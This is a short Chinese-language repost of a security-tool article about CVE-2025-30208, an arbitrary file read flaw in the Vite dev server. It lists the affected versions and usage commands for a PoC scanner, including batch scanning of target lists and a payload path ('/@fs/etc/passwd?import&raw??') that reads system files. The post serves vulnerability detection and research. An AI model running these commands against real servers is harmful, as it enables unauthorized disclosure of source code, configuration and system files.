Vite 是一款高效的现代化前端构建工具,以快速冷启动和热更新为核心优势,广泛应用于 Vue、React 等项目开发。攻击者可利用CVE-2025-30208该漏洞绕过开发服务器的保护机制,非法读取服务器上的任意文件,包括项目源码、敏感配置文件等,导致严重的数据泄露风险。影响范围:
6.2.0 <= Vite <= 6.2.26.1.0 <= Vite <= 6.1.16.0.0 <= Vite <= 6.0.115.0.0 <= Vite <= 5.4.14Vite <= 4.5.9
常用命令
1. 扫描单个目标:python CVE-2025-30208-PoC.py -u http://example.com -t 52、批量扫描目标文件:python CVE-2025-30208-PoC.py -f targets.txt -o vuln_results.xlsx3、使用自定义payload:python CVE-2025-30208-PoC.py -u http://example.com -p "/@fs/etc/passwd?import&raw??"4、使用代理调试:python CVE-2025-30208-PoC.py -u http://example.com --proxy http://127.0.0.1:80805、组合使用参数:python CVE-2025-30208-PoC.py -f targets.txt -t 200 -o critical_vulns.xlsx
https://github.com/iSee857/CVE-2025-30208-PoC
原文始发于微信公众号(Web安全工具库):Vite任意文件读取漏洞检测CVE-2025-30208-PoC(3月27日更新)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论